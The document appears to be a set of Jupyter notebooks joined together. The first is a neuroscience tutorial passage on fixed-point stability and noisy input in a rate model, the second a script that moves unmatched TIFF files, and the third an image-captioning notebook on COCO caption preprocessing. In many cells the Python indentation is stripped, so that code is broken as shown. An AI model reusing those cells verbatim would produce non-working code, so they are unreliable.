a, theta, w, I_ext: simulation parameters
mytol : tolerance, default as 10^{-4}
Returns :
Whether it is a correct fixed point: True/False
"""
# calculate Equation(3)
y = x_fp - F(w * x_fp + I_ext, a, theta)
# Here we set tolerance as 10^{-4}
return np.abs(y) < mytol
def my_fp_finder(pars, r_guess_vector, mytol=1e-4):
"""
Calculate the fixed point(s) through drE/dt=0
Args:
pars : Parameter dictionary
r_guess_vector : Initial values used for scipy.optimize function
mytol : tolerance for checking fixed point, default as 10^{-4}
Returns:
x_fps : values of fixed points
"""
x_fps = []
for r_guess in r_guess_vector:
x_fp = my_fp_single(r_guess, **pars)
if check_fp_single(x_fp, **pars, mytol=mytol):
x_fps.append(x_fp)
return x_fps
help(my_fp_finder)
r = np.linspace(0, 1, 1000)
pars = default_pars_single(I_ext=0.5, w=5)
drdt = compute_drdt(r, **pars)
#############################################################################
# TODO for students:
# Define initial values close to the intersections of drdt and y=0
# (How many initial values? Hint: How many times do the two lines intersect?)
# Calculate the fixed point with these initial values and plot them
#############################################################################
r_guess_vector = [...]
# Uncomment to test your values
# x_fps = my_fp_finder(pars, r_guess_vector)
# plot_dr_r(r, drdt, x_fps)
# to_remove solution
r = np.linspace(0, 1, 1000)
pars = default_pars_single(I_ext=0.5, w=5)
drdt = compute_drdt(r, **pars)
r_guess_vector = [0, .4, .9]
x_fps = my_fp_finder(pars, r_guess_vector)
with plt.xkcd():
plot_dr_r(r, drdt, x_fps)
```
## Interactive Demo: fixed points as a function of recurrent and external inputs.
You can now explore how the previous plot changes when the recurrent coupling $w$ and the external input $I_{\text{ext}}$ take different values. How does the number of fixed points change?
```
# @title
# @markdown Make sure you execute this cell to enable the widget!
def plot_intersection_single(w, I_ext):
# set your parameters
pars = default_pars_single(w=w, I_ext=I_ext)
# find fixed points
r_init_vector = [0, .4, .9]
x_fps = my_fp_finder(pars, r_init_vector)
# plot
r = np.linspace(0, 1., 1000)
drdt = (-r + F(w * r + I_ext, pars['a'], pars['theta'])) / pars['tau']
plot_dr_r(r, drdt, x_fps)
_ = widgets.interact(plot_intersection_single, w=(1, 7, 0.2),
I_ext=(0, 3, 0.1))
# to_remove explanation
"""
Discussion:
The fixed points of the single excitatory neuron population are determined by both
recurrent connections w and external input I_ext. In a previous interactive demo
we saw how the system showed two different steady-states when w = 0. But when w
does not equal 0, for some range of w the system shows three fixed points (the middle
one being unstable) and the steady state depends on the initial conditions (i.e.,
r at time zero).
More on this will be explained in the next section.
""";
```
---
# Summary
In this tutorial, we have investigated the dynamics of a rate-based single population of neurons.
We learned about:
- The effect of the input parameters and the time constant of the network on the dynamics of the population.
- How to find the fixed point(s) of the system.
Next, we have two bonus (but important) concepts in dynamical system analysis and simulation. If you have time left, watch the next video and proceed to solve the exercises. You will learn:
- How to determine the stability of a fixed point by linearizing the system.
- How to add realistic inputs to our model.
---
# Bonus 1: Stability of a fixed point
```
# @title Video 3: Stability of fixed points
from IPython.display import YouTubeVideo
video = YouTubeVideo(id="KKMlWWU83Jg", width=854, height=480, fs=1)
print("Video available at https://youtube.com/watch?v=" + video.id)
video
```
#### Initial values and trajectories
Here, let us first set $w=5.0$ and $I_{\text{ext}}=0.5$, and investigate the dynamics of $r(t)$ starting with different initial values $r(0) \equiv r_{\text{init}}$. We will plot the trajectories of $r(t)$ with $r_{\text{init}} = 0.0, 0.1, 0.2,..., 0.9$.
```
# @markdown Execute this cell to see the trajectories!
pars = default_pars_single()
pars['w'] = 5.0
pars['I_ext'] = 0.5
plt.figure(figsize=(8, 5))
for ie in range(10):
pars['r_init'] = 0.1 * ie # set the initial value
r = simulate_single(pars) # run the simulation
# plot the activity with given initial
plt.plot(pars['range_t'], r, 'b', alpha=0.1 + 0.1 * ie,
label=r'r$_{\mathrm{init}}$=%.1f' % (0.1 * ie))
plt.xlabel('t (ms)')
plt.title('Two steady states?')
plt.ylabel(r'$r$(t)')
plt.legend(loc=[1.01, -0.06], fontsize=14)
plt.show()
```
## Interactive Demo: dynamics as a function of the initial value
Let's now set $r_{\rm init}$ to a value of your choice in this demo. How does the solution change? What do you observe?
```
# @title
# @markdown Make sure you execute this cell to enable the widget!
pars = default_pars_single(w=5.0, I_ext=0.5)
def plot_single_diffEinit(r_init):
pars['r_init'] = r_init
r = simulate_single(pars)
plt.figure()
plt.plot(pars['range_t'], r, 'b', zorder=1)
plt.plot(0, r[0], 'bo', alpha=0.7, zorder=2)
plt.xlabel('t (ms)', fontsize=16)
plt.ylabel(r'$r(t)$', fontsize=16)
plt.ylim(0, 1.0)
plt.show()
_ = widgets.interact(plot_single_diffEinit, r_init=(0, 1, 0.02))
# to_remove explanation
"""
Discussion:
To better appreciate what is happening here, you should go back to the previous
interactive demo. Set w = 5 and I_ext = 0.5.
You will find that there are three fixed points of the system for these values of
w and I_ext. Now, choose an initial value in this demo and see in which direction
the system output moves. When r_init is in the vicinity of the leftmost fixed
point, it moves towards the leftmost fixed point. When r_init is in the vicinity
of the rightmost fixed point, it moves towards the rightmost fixed point.
""";
```
### Stability analysis via linearization of the dynamics
Just like Equation $1$ in the case ($w=0$) discussed above, a generic linear system
$$\frac{dx}{dt} = \lambda (x - b),$$
has a fixed point for $x=b$. The analytical solution of such a system can be found to be:
$$x(t) = b + \big( x(0) - b \big) \text{e}^{\lambda t}.$$
Now consider a small perturbation of the activity around the fixed point: $x(0) = b+ \epsilon$, where $|\epsilon| \ll 1$. Will the perturbation $\epsilon(t)$ grow with time or will it decay to the fixed point? The evolution of the perturbation with time can be written, using the analytical solution for $x(t)$, as:
$$\epsilon (t) = x(t) - b = \epsilon \text{e}^{\lambda t}$$
- if $\lambda < 0$, $\epsilon(t)$ decays to zero, $x(t)$ will still converge to $b$ and the fixed point is "**stable**".
- if $\lambda > 0$, $\epsilon(t)$ grows with time, $x(t)$ will leave the fixed point $b$ exponentially, and the fixed point is, therefore, "**unstable**".
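This dichotomy can be checked numerically. The sketch below Euler-integrates the generic linear system above from a slightly perturbed initial condition; the values of $b$, $\epsilon$, and the step size are illustrative choices, not parameters from this tutorial.

```python
def perturbation(lam, b=0.5, eps=0.01, dt=0.01, T=10.0):
    """Euler-integrate dx/dt = lam * (x - b) from x(0) = b + eps
    and return the final deviation |x(T) - b|."""
    x = b + eps
    for _ in range(int(T / dt)):
        x += dt * lam * (x - b)
    return abs(x - b)

# lam < 0: the perturbation decays, so the fixed point is stable
print(perturbation(-1.0) < 0.01)   # True
# lam > 0: the perturbation grows, so the fixed point is unstable
print(perturbation(+1.0) > 0.01)   # True
```

Comparing the result against the analytical $\epsilon\,\text{e}^{\lambda T}$ shows the Euler solution tracks it closely for small `dt`.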
### Compute the stability of Equation $1$
Similar to what we did in the linear system above, in order to determine the stability of a fixed point $r^{*}$ of the excitatory population dynamics, we perturb Equation (1) around $r^{*}$, i.e., $r = r^{*} + \epsilon$. Plugging this into Equation (1) and expanding to first order in the small perturbation $\epsilon$, we obtain the equation determining the time evolution of $\epsilon(t)$:
\begin{align}
\tau \frac{d\epsilon}{dt} \approx -\epsilon + w F'(w\cdot r^{*} + I_{\text{ext}};a,\theta) \epsilon
\end{align}
where $F'(\cdot)$ is the derivative of the transfer function $F(\cdot)$. We can rewrite the above equation as:
\begin{align}
\frac{d\epsilon}{dt} \approx \frac{\epsilon}{\tau }[-1 + w F'(w\cdot r^* + I_{\text{ext}};a,\theta)]
\end{align}
That is, as in the linear system above, the value of
$$\lambda = [-1+ wF'(w\cdot r^* + I_{\text{ext}};a,\theta)]/\tau \qquad (4)$$
determines whether the perturbation will grow or decay to zero, i.e., $\lambda$ defines the stability of the fixed point. This value is called the **eigenvalue** of the dynamical system.
## Exercise 4: Compute $dF$
The derivative of the sigmoid transfer function is:
\begin{align}
\frac{dF}{dx} & = \frac{d}{dx} (1+\exp\{-a(x-\theta)\})^{-1} \\
& = a\exp\{-a(x-\theta)\} (1+\exp\{-a(x-\theta)\})^{-2}. \qquad (5)
\end{align}
Let's now implement the derivative $\displaystyle{\frac{dF}{dx}}$ in the following cell and plot it.
```
def dF(x, a, theta):
  """
  Derivative of the population activation function.

  Args:
    x     : the population input
    a     : the gain of the function
    theta : the threshold of the function

  Returns:
    dFdx  : the derivative of the population activation function at input x
  """
  ###########################################################################
  # TODO for students: compute dFdx ##
  raise NotImplementedError("Student exercise: compute the derivative of F")
  ###########################################################################

  # Calculate the derivative of the population activation function
  dFdx = ...

  return dFdx
pars = default_pars_single() # get default parameters
x = np.arange(0, 10, .1) # set the range of input
# Uncomment below to test your function
# df = dF(x, pars['a'], pars['theta'])
# plot_dFdt(x, df)
# to_remove solution
def dF(x, a, theta):
  """
  Derivative of the population activation function.

  Args:
    x     : the population input
    a     : the gain of the function
    theta : the threshold of the function

  Returns:
    dFdx  : the derivative of the population activation function at input x
  """
  # Calculate the derivative of the population activation function
  dFdx = a * np.exp(-a * (x - theta)) * (1 + np.exp(-a * (x - theta)))**-2
  return dFdx
pars = default_pars_single() # get default parameters
x = np.arange(0, 10, .1) # set the range of input
df = dF(x, pars['a'], pars['theta'])
with plt.xkcd():
plot_dFdt(x, df)
```
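As a quick sanity check on Equation (5), the analytic derivative can be compared against a central finite difference of the sigmoid. This is a standalone sketch: the local `F` and `dF_analytic` below re-implement the formulas above, and the `a`, `theta` values are illustrative rather than the tutorial's defaults.

```python
import numpy as np

def F(x, a, theta):
    """Sigmoid transfer function, (1 + exp(-a(x - theta)))^-1."""
    return 1 / (1 + np.exp(-a * (x - theta)))

def dF_analytic(x, a, theta):
    """Analytic derivative from Equation (5)."""
    return a * np.exp(-a * (x - theta)) * (1 + np.exp(-a * (x - theta)))**-2

a, theta, h = 1.2, 2.8, 1e-5          # illustrative gain/threshold, small step
x = np.linspace(0, 10, 50)
# Central finite difference as an independent check
numeric = (F(x + h, a, theta) - F(x - h, a, theta)) / (2 * h)
print(np.allclose(dF_analytic(x, a, theta), numeric, atol=1e-6))  # True
```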
## Exercise 5: Compute eigenvalues
As discussed above, for the case with $w=5.0$ and $I_{\text{ext}}=0.5$, the system displays **three** fixed points. However, when we simulated the dynamics and varied the initial conditions $r_{\rm init}$, we could only obtain **two** steady states. In this exercise, we will now check the stability of each of the three fixed points by calculating the corresponding eigenvalues with the function `eig_single`. Check the sign of each eigenvalue (i.e., stability of each fixed point). How many of the fixed points are stable?
Recall that the eigenvalue at a fixed point $r^*$ is given by Equation (4):
$$\lambda = [-1+ wF'(w\cdot r^* + I_{\text{ext}};a,\theta)]/\tau$$
```
def eig_single(fp, tau, a, theta, w, I_ext, **other_pars):
  """
  Args:
    fp : fixed point r_fp
    tau, a, theta, w, I_ext : simulation parameters

  Returns:
    eig : eigenvalue of the linearized system
  """
  #####################################################################
  ## TODO for students: compute the eigenvalue and disable the error
  raise NotImplementedError("Student exercise: compute the eigenvalue")
  ######################################################################

  # Compute the eigenvalue
  eig = ...

  return eig
# Find the eigenvalues for all fixed points of Exercise 2
pars = default_pars_single(w=5, I_ext=.5)
r_guess_vector = [0, .4, .9]
x_fp = my_fp_finder(pars, r_guess_vector)
# Uncomment below lines after completing the eig_single function.
# for n, fp in enumerate(x_fp):
#   eig_fp = eig_single(fp, **pars)
#   print(f'Fixed point{n+1} at {fp:.3f} with Eigenvalue={eig_fp:.3f}')
```
**SAMPLE OUTPUT**
```
Fixed point1 at 0.042 with Eigenvalue=-0.583
Fixed point2 at 0.447 with Eigenvalue=0.498
Fixed point3 at 0.900 with Eigenvalue=-0.626
```
```
# to_remove solution
def eig_single(fp, tau, a, theta, w, I_ext, **other_pars):
  """
  Args:
    fp : fixed point r_fp
    tau, a, theta, w, I_ext : simulation parameters

  Returns:
    eig : eigenvalue of the linearized system
  """
  # Compute the eigenvalue
  eig = (-1. + w * dF(w * fp + I_ext, a, theta)) / tau
  return eig

# Find the eigenvalues for all fixed points of Exercise 2
pars = default_pars_single(w=5, I_ext=.5)
r_guess_vector = [0, .4, .9]
x_fp = my_fp_finder(pars, r_guess_vector)
for n, fp in enumerate(x_fp):
  eig_fp = eig_single(fp, **pars)
  print(f'Fixed point{n+1} at {fp:.3f} with Eigenvalue={eig_fp:.3f}')
```
## Think!
Throughout the tutorial, we have assumed $w > 0$, i.e., we considered a single population of **excitatory** neurons. What do you think the behavior of a population of **inhibitory** neurons will be, i.e., when $w > 0$ is replaced by $w < 0$?
```
# to_remove explanation
"""
Discussion:
You can check this by going back to the second-to-last interactive demo and setting
the weight to w < 0. You will notice that the system has only one fixed point, which
lies at zero. For these dynamics, the system will eventually converge to zero. But
try it out.
""";
```
---
# Bonus 2: Noisy input drives the transition between two stable states
## Ornstein-Uhlenbeck (OU) process
As discussed in several previous tutorials, the OU process is usually used to generate a noisy input into the neuron. The OU input $\eta(t)$ follows:
$$\tau_\eta \frac{d}{dt}\eta(t) = -\eta (t) + \sigma_\eta\sqrt{2\tau_\eta}\xi(t)$$
Execute the following function `my_OU(pars, sig, myseed=False)` to generate an OU process.
```
# @title OU process `my_OU(pars, sig, myseed=False)`
# @markdown Make sure you execute this cell to visualize the noise!
def my_OU(pars, sig, myseed=False):
"""
  A function that generates an Ornstein-Uhlenbeck process

  Args:
    pars   : parameter dictionary
    sig    : noise amplitude
    myseed : random seed. int or boolean

  Returns:
    I_ou   : Ornstein-Uhlenbeck input current
"""
# Retrieve simulation parameters
dt, range_t = pars['dt'], pars['range_t']
Lt = range_t.size
tau_ou = pars['tau_ou'] # [ms]
# set random seed
if myseed:
np.random.seed(seed=myseed)
else:
np.random.seed()
# Initialize
noise = np.random.randn(Lt)
I_ou = np.zeros(Lt)
I_ou[0] = noise[0] * sig
# generate OU
for it in range(Lt - 1):
I_ou[it + 1] = (I_ou[it]
+ dt / tau_ou * (0. - I_ou[it])
+ np.sqrt(2 * dt / tau_ou) * sig * noise[it + 1])
return I_ou
pars = default_pars_single(T=100)
pars['tau_ou'] = 1. # [ms]
sig_ou = 0.1
I_ou = my_OU(pars, sig=sig_ou, myseed=2020)
plt.figure(figsize=(10, 4))
plt.plot(pars['range_t'], I_ou, 'r')
plt.xlabel('t (ms)')
plt.ylabel(r'$I_{\mathrm{OU}}$')
plt.show()
```
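With this parametrization, $\sigma_\eta$ sets the stationary standard deviation of the noise (up to discretization error). The standalone sketch below repeats the Euler-Maruyama update from `my_OU` with illustrative parameters and checks that property empirically:

```python
import numpy as np

def ou_process(dt, tau, sig, n_steps, seed=0):
    """Euler-Maruyama discretization of the OU equation above."""
    rng = np.random.default_rng(seed)
    eta = np.zeros(n_steps)
    for t in range(n_steps - 1):
        eta[t + 1] = (eta[t]
                      - dt / tau * eta[t]
                      + np.sqrt(2 * dt / tau) * sig * rng.standard_normal())
    return eta

eta = ou_process(dt=0.1, tau=1.0, sig=0.5, n_steps=200_000)
# After a burn-in, the empirical std should be close to sig = 0.5
print(round(float(eta[1000:].std()), 1))  # 0.5
```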
## Example: Up-Down transition
In the presence of two or more fixed points, noisy inputs can drive transitions between the fixed points! Here, we stimulate an E population for 1,000 ms by applying OU inputs.
```
# @title Simulation of an E population with OU inputs
# @markdown Make sure you execute this cell to spot the Up-Down states!
pars = default_pars_single(T=1000)
pars['w'] = 5.0
sig_ou = 0.7
pars['tau_ou'] = 1. # [ms]
pars['I_ext'] = 0.56 + my_OU(pars, sig=sig_ou, myseed=2020)
r = simulate_single(pars)
plt.figure(figsize=(10, 4))
plt.plot(pars['range_t'], r, 'b', alpha=0.8)
plt.xlabel('t (ms)')
plt.ylabel(r'$r(t)$')
plt.show()
```
|
github_jupyter
|
# Find \*.tifs with no matching \*.jpg
#### Created on Cinco de Mayo in 2020 by Jeremy Moore and David Armstrong to identify \*.tif images that don't have a matching \*.jpg image for the Asian Art Museum of San Francisco
1. Manually set root_dir_path to the full path of the directory containing your *all_jpgs* and *all_tifs* directories
1. Programmatically create a *no_match* directory inside of *all_tifs*
1. Get a list of all \*.tifs in the *all_tifs* directory
1. Get the identifier, or stem, of each \*.tif
1. Check whether this identifier exists as a \*.jpg in the *all_jpgs* directory, first as a dry run
1. Run again and, if there is no matching \*.jpg, move the \*.tif into the *no_match* directory
***Update the root_dir_path location and verify the names of the \*.jpg and \*.tif directories below BEFORE running any cells!***
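Before pointing the cells below at real data, the stem-matching logic can be rehearsed in a throwaway directory. The sketch below is self-contained: the scratch directory comes from `tempfile` and the filenames are made up.

```python
from pathlib import Path
import tempfile

# Build a scratch layout mirroring all_tifs / all_jpgs / no_match
root = Path(tempfile.mkdtemp())
all_tifs = root / 'all_tifs'
all_jpgs = root / 'all_jpgs'
no_match = all_tifs / 'no_match'
for d in (all_tifs, all_jpgs, no_match):
    d.mkdir(parents=True)

(all_tifs / 'img_001.tif').touch()
(all_tifs / 'img_002.tif').touch()
(all_jpgs / 'img_001.jpg').touch()   # only img_001 has a JPEG partner

# Same idea as the cells below: match on the stem, move unmatched TIFFs
for tif_path in sorted(all_tifs.glob('*.tif')):
    jpg_path = all_jpgs / f'{tif_path.stem}.jpg'
    if not jpg_path.is_file():
        tif_path.rename(no_match / tif_path.name)

print(sorted(p.name for p in no_match.iterdir()))  # ['img_002.tif']
```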
```
# imports from standard library
from pathlib import Path
# set root directory path that contains the directories with our tifs and jpgs
root_dir_path = Path('/Users/dlisla/Pictures/test_directory')
print(f'root_dir_path: {root_dir_path}')
print(f'root_dir_path.name: {root_dir_path.name}')
# set path to directory with our all_jpgs and all_tifs
bad_jpg_dir_path = root_dir_path.joinpath('all_jpgs')
all_tifs_dir_path = root_dir_path.joinpath('all_tifs')
# create a directory inside of all_tifs directory named no_match to move
no_match_dir_path = all_tifs_dir_path.joinpath('no_match')
no_match_dir_path.mkdir() # will raise a FileExistsError if the no_match directory already exists
# verify existence of no_match directory, if False, then do not continue
print(f'Does the no_match directory exist? {no_match_dir_path.is_dir()}')
# get sorted list of all *.tifs in all_tifs directory
# NOTE: this is NOT recursive and will not look inside of all_tifs subdirectories
# NOTE: this may also find non-image hidden files that start with a '.' and end with .tif
tif_path_list = sorted(all_tifs_dir_path.glob('*.tif'))
print(f'Total number of *.tif: {len(tif_path_list)}\n')
print(f'First *.tif paths: {tif_path_list[0]}')
print(f'Last *.tif paths: {tif_path_list[-1]}')
# for loop to dry-run our code and see what will happen
for tif_path in tif_path_list:
# get image's identifier to match against the JPEG filenames
identifier = tif_path.stem # stem is the Python name for identifier
# set jpg filename and path
jpg_filename = f'{identifier}.jpg'
jpg_path = bad_jpg_dir_path.joinpath(jpg_filename)
# does jpg exist?
if jpg_path.is_file(): # there's a match
# print(f'{jpg_path.name} has a match!\n') # commented out to silently skip matched images
pass
else: # we need to move it into our no_match directory
print(f'{tif_path.name} has no matching *.jpg')
# set new tif path inside of the no_match directory
new_tif_path = no_match_dir_path.joinpath(tif_path.name)
print(f'Moving to {new_tif_path} . . . (not really, this is a test)\n')
# warning, will move files!
for tif_path in tif_path_list:
# get image's identifier to match against the JPEG filenames
identifier = tif_path.stem # stem is the Python name for identifier
# set jpg filename and path
jpg_filename = f'{identifier}.jpg'
jpg_path = bad_jpg_dir_path.joinpath(jpg_filename)
# does jpg exist?
if jpg_path.is_file(): # there's a match
# print(f'{jpg_path.name} has a match!\n') # commented out to silently skip matched images
pass
else: # we need to move it into our no_match directory
print(f'{tif_path.name} has no JPEG')
# set new tif path inside of the no_match directory
new_tif_path = no_match_dir_path.joinpath(tif_path.name)
print(f'Moving to {new_tif_path} . . .')
# move our file
tif_path.rename(new_tif_path)
if new_tif_path.is_file():
print('Success!\n')
else:
print(f'Something broke while moving {tif_path.name} to {new_tif_path}!!\n')
```
|
github_jupyter
|
# Computer Vision Nanodegree
## Project: Image Captioning
---
In this notebook, you will learn how to load and pre-process data from the [COCO dataset](http://cocodataset.org/#home). You will also design a CNN-RNN model for automatically generating image captions.
Note that **any amendments that you make to this notebook will not be graded**. However, you will use the instructions provided in **Step 3** and **Step 4** to implement your own CNN encoder and RNN decoder by making amendments to the **models.py** file provided as part of this project. Your **models.py** file **will be graded**.
Feel free to use the links below to navigate the notebook:
- [Step 1](#step1): Explore the Data Loader
- [Step 2](#step2): Use the Data Loader to Obtain Batches
- [Step 3](#step3): Experiment with the CNN Encoder
- [Step 4](#step4): Implement the RNN Decoder
<a id='step1'></a>
## Step 1: Explore the Data Loader
We have already written a [data loader](http://pytorch.org/docs/master/data.html#torch.utils.data.DataLoader) that you can use to load the COCO dataset in batches.
In the code cell below, you will initialize the data loader by using the `get_loader` function in **data_loader.py**.
> For this project, you are not permitted to change the **data_loader.py** file, which must be used as-is.
The `get_loader` function takes as input a number of arguments that can be explored in **data_loader.py**. Take the time to explore these arguments now by opening **data_loader.py** in a new window. Most of the arguments must be left at their default values, and you are only allowed to amend the values of the arguments below:
1. **`transform`** - an [image transform](http://pytorch.org/docs/master/torchvision/transforms.html) specifying how to pre-process the images and convert them to PyTorch tensors before using them as input to the CNN encoder. For now, you are encouraged to keep the transform as provided in `transform_train`. You will have the opportunity later to choose your own image transform to pre-process the COCO images.
2. **`mode`** - one of `'train'` (loads the training data in batches) or `'test'` (for the test data). We will say that the data loader is in training or test mode, respectively. While following the instructions in this notebook, please keep the data loader in training mode by setting `mode='train'`.
3. **`batch_size`** - determines the batch size. When training the model, this is number of image-caption pairs used to amend the model weights in each training step.
4. **`vocab_threshold`** - the total number of times that a word must appear in the training captions before it is used as part of the vocabulary. Words that have fewer than `vocab_threshold` occurrences in the training captions are considered unknown words.
5. **`vocab_from_file`** - a Boolean that decides whether to load the vocabulary from file.
We will describe the `vocab_threshold` and `vocab_from_file` arguments in more detail soon. For now, run the code cell below. Be patient - it may take a couple of minutes to run!
```
import sys
sys.path.append('/opt/cocoapi/PythonAPI')
from pycocotools.coco import COCO
!pip install nltk
import nltk
nltk.download('punkt')
from data_loader import get_loader
from torchvision import transforms
# Define a transform to pre-process the training images.
transform_train = transforms.Compose([
transforms.Resize(256), # smaller edge of image resized to 256
transforms.RandomCrop(224), # get 224x224 crop from random location
transforms.RandomHorizontalFlip(), # horizontally flip image with probability=0.5
transforms.ToTensor(), # convert the PIL Image to a tensor
transforms.Normalize((0.485, 0.456, 0.406), # normalize image for pre-trained model
(0.229, 0.224, 0.225))])
# Set the minimum word count threshold.
vocab_threshold = 5
# Specify the batch size.
batch_size = 10
# Obtain the data loader.
data_loader = get_loader(transform=transform_train,
mode='train',
batch_size=batch_size,
vocab_threshold=vocab_threshold,
vocab_from_file=False)
```
When you ran the code cell above, the data loader was stored in the variable `data_loader`.
You can access the corresponding dataset as `data_loader.dataset`. This dataset is an instance of the `CoCoDataset` class in **data_loader.py**. If you are unfamiliar with data loaders and datasets, you are encouraged to review [this PyTorch tutorial](http://pytorch.org/tutorials/beginner/data_loading_tutorial.html).
### Exploring the `__getitem__` Method
The `__getitem__` method in the `CoCoDataset` class determines how an image-caption pair is pre-processed before being incorporated into a batch. This is true for all `Dataset` classes in PyTorch; if this is unfamiliar to you, please review [the tutorial linked above](http://pytorch.org/tutorials/beginner/data_loading_tutorial.html).
When the data loader is in training mode, this method begins by first obtaining the filename (`path`) of a training image and its corresponding caption (`caption`).
#### Image Pre-Processing
Image pre-processing is relatively straightforward (from the `__getitem__` method in the `CoCoDataset` class):
```python
# Convert image to tensor and pre-process using transform
image = Image.open(os.path.join(self.img_folder, path)).convert('RGB')
image = self.transform(image)
```
After loading the image in the training folder with name `path`, the image is pre-processed using the same transform (`transform_train`) that was supplied when instantiating the data loader.
#### Caption Pre-Processing
The captions also need to be pre-processed and prepped for training. In this example, for generating captions, we are aiming to create a model that predicts the next token of a sentence from previous tokens, so we turn the caption associated with any image into a list of tokenized words, before casting it to a PyTorch tensor that we can use to train the network.
To understand in more detail how COCO captions are pre-processed, we'll first need to take a look at the `vocab` instance variable of the `CoCoDataset` class. The code snippet below is pulled from the `__init__` method of the `CoCoDataset` class:
```python
def __init__(self, transform, mode, batch_size, vocab_threshold, vocab_file, start_word,
end_word, unk_word, annotations_file, vocab_from_file, img_folder):
...
self.vocab = Vocabulary(vocab_threshold, vocab_file, start_word,
end_word, unk_word, annotations_file, vocab_from_file)
...
```
From the code snippet above, you can see that `data_loader.dataset.vocab` is an instance of the `Vocabulary` class from **vocabulary.py**. Take the time now to verify this for yourself by looking at the full code in **data_loader.py**.
We use this instance to pre-process the COCO captions (from the `__getitem__` method in the `CoCoDataset` class):
```python
# Convert caption to tensor of word ids.
tokens = nltk.tokenize.word_tokenize(str(caption).lower()) # line 1
caption = [] # line 2
caption.append(self.vocab(self.vocab.start_word)) # line 3
caption.extend([self.vocab(token) for token in tokens]) # line 4
caption.append(self.vocab(self.vocab.end_word)) # line 5
caption = torch.Tensor(caption).long() # line 6
```
As you will see soon, this code converts any string-valued caption to a list of integers, before casting it to a PyTorch tensor. To see how this code works, we'll apply it to the sample caption in the next code cell.
```
sample_caption = 'A person doing a trick on a rail while riding a skateboard.'
```
In **`line 1`** of the code snippet, every letter in the caption is converted to lowercase, and the [`nltk.tokenize.word_tokenize`](http://www.nltk.org/) function is used to obtain a list of string-valued tokens. Run the next code cell to visualize the effect on `sample_caption`.
```
import nltk
sample_tokens = nltk.tokenize.word_tokenize(str(sample_caption).lower())
print(sample_tokens)
```
In **`line 2`** and **`line 3`** we initialize an empty list and append an integer to mark the start of a caption. The [paper](https://arxiv.org/pdf/1411.4555.pdf) that you are encouraged to implement uses a special start word (and a special end word, which we'll examine below) to mark the beginning (and end) of a caption.
This special start word (`"<start>"`) is decided when instantiating the data loader and is passed as a parameter (`start_word`). You are **required** to keep this parameter at its default value (`start_word="<start>"`).
As you will see below, the integer `0` is always used to mark the start of a caption.
```
sample_caption = []
start_word = data_loader.dataset.vocab.start_word
print('Special start word:', start_word)
sample_caption.append(data_loader.dataset.vocab(start_word))
print(sample_caption)
```
In **`line 4`**, we continue the list by adding integers that correspond to each of the tokens in the caption.
```
sample_caption.extend([data_loader.dataset.vocab(token) for token in sample_tokens])
print(sample_caption)
```
In **`line 5`**, we append a final integer to mark the end of the caption.
Identical to the case of the special start word (above), the special end word (`"<end>"`) is decided when instantiating the data loader and is passed as a parameter (`end_word`). You are **required** to keep this parameter at its default value (`end_word="<end>"`).
As you will see below, the integer `1` is always used to mark the end of a caption.
```
end_word = data_loader.dataset.vocab.end_word
print('Special end word:', end_word)
sample_caption.append(data_loader.dataset.vocab(end_word))
print(sample_caption)
```
Finally, in **`line 6`**, we convert the list of integers to a PyTorch tensor and cast it to [long type](http://pytorch.org/docs/master/tensors.html#torch.Tensor.long). You can read more about the different types of PyTorch tensors on the [website](http://pytorch.org/docs/master/tensors.html).
```
import torch
sample_caption = torch.Tensor(sample_caption).long()
print(sample_caption)
```
And that's it! In summary, any caption is converted to a list of tokens, with _special_ start and end tokens marking the beginning and end of the sentence:
```
[<start>, 'a', 'person', 'doing', 'a', 'trick', 'while', 'riding', 'a', 'skateboard', '.', <end>]
```
This list of tokens is then turned into a list of integers, where every distinct word in the vocabulary has an associated integer value:
```
[0, 3, 98, 754, 3, 396, 207, 139, 3, 753, 18, 1]
```
Finally, this list is converted to a PyTorch tensor. All of the captions in the COCO dataset are pre-processed using this same procedure from **`lines 1-6`** described above.
As you saw, in order to convert a token to its corresponding integer, we call `data_loader.dataset.vocab` as a function. The details of how this call works can be explored in the `__call__` method in the `Vocabulary` class in **vocabulary.py**.
```python
def __call__(self, word):
if not word in self.word2idx:
return self.word2idx[self.unk_word]
return self.word2idx[word]
```
The `word2idx` instance variable is a Python [dictionary](https://docs.python.org/3/tutorial/datastructures.html#dictionaries) that is indexed by string-valued keys (mostly tokens obtained from training captions). For each key, the corresponding value is the integer that the token is mapped to in the pre-processing step.
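The fallback behavior of `__call__` can be mimicked with a plain dictionary. The sketch below uses a made-up five-entry `word2idx`, not the real vocabulary:

```python
# Toy stand-in for the word2idx dictionary (made-up ids)
word2idx = {'<start>': 0, '<end>': 1, '<unk>': 2, 'a': 3, 'person': 4}

def to_idx(word, unk_word='<unk>'):
    """Map a token to its integer id, falling back to the unknown token."""
    return word2idx.get(word, word2idx[unk_word])

print([to_idx(w) for w in ['<start>', 'a', 'person', 'jfkafejw', '<end>']])
# -> [0, 3, 4, 2, 1]
```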
Use the code cell below to view a subset of this dictionary.
```
# Preview the word2idx dictionary.
dict(list(data_loader.dataset.vocab.word2idx.items())[:10])
```
We also print the total number of keys.
```
# Print the total number of keys in the word2idx dictionary.
print('Total number of tokens in vocabulary:', len(data_loader.dataset.vocab))
```
As you will see if you examine the code in **vocabulary.py**, the `word2idx` dictionary is created by looping over the captions in the training dataset. If a token appears no less than `vocab_threshold` times in the training set, then it is added as a key to the dictionary and assigned a corresponding unique integer. You will have the option later to amend the `vocab_threshold` argument when instantiating your data loader. Note that in general, **smaller** values for `vocab_threshold` yield a **larger** number of tokens in the vocabulary. You are encouraged to check this for yourself in the next code cell by decreasing the value of `vocab_threshold` before creating a new data loader.
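The thresholding idea can be illustrated independently of COCO with `collections.Counter` and a handful of toy captions (everything below is made up; the real `Vocabulary` class also tokenizes with `nltk` and reserves the special tokens):

```python
from collections import Counter

# Toy captions standing in for the training set
captions = ['a dog runs', 'a dog sleeps', 'a cat sleeps', 'a bird sings']
counter = Counter(tok for cap in captions for tok in cap.split())

def build_vocab(counter, vocab_threshold):
    """Keep tokens seen at least vocab_threshold times; ids 0-2 stay reserved."""
    words = sorted(w for w, c in counter.items() if c >= vocab_threshold)
    return {w: i + 3 for i, w in enumerate(words)}

# Smaller thresholds yield larger vocabularies
print(len(build_vocab(counter, 2)), len(build_vocab(counter, 1)))  # 3 7
```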
```
# Modify the minimum word count threshold.
vocab_threshold = 4
# Obtain the data loader.
data_loader = get_loader(transform=transform_train,
mode='train',
batch_size=batch_size,
vocab_threshold=vocab_threshold,
vocab_from_file=False)
# Print the total number of keys in the word2idx dictionary.
print('Total number of tokens in vocabulary:', len(data_loader.dataset.vocab))
```
